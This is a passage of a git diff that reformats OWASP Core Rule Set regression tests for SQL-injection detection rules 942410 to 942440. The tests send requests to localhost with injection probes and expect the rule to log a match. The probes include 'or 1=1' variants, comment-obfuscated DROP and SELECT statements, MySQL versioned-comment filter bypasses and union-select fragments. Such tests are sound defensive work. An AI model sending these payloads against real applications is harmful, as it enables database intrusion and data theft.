+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=substr("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 96
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SUBSTR("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 97
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=substring("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 98
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SUBSTRING("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 99
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=sysdate("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 100
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "time ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 101
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=time%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 102
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=trim%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 103
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=Uncompress+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 104
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=unhex%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 105
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=uNhEx%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 106
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=updatexml%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 107
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=UpdateXML%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 108
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=UPPER%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 109
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=user+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 110
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=user%2F%3F%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 111
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=user%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 112
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=values+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 113
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=VALUES%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 114
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=version%3D%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 115
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=version%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 116
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=xmltype%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 117
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=XMLType%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 118
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=year%5D%3D%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
index 576280e8a..ef14db340 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942420.yaml tests: - - test_title: 942420-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "942420" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index cca5bfa0c..7446ef615 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml 
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942421.yaml tests: - - test_title: 942421-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index aa1a717cd..53bc53f74 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml 
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942430.yaml tests: - - test_title: 942430-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fb9b2e02a..fcf159aed 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml 
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942431.yaml tests: - - test_title: 942431-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b30a904c8..be29ba911 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml 
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942432.yaml tests: - - test_title: 942432-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 508f02823..ac44eecc4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml 
@@ -2,338 +2,316 @@ meta: author: "Christian S.J. Peron, Max Leske, azurit" description: None - enabled: true - name: 942440.yaml tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: 
"HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id 
"942440" + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" 
- uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id "942440" + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" 
+ output: + log_contains: id "942440" + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - output: - log_contains: id "942440" - - test_title: 
942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: 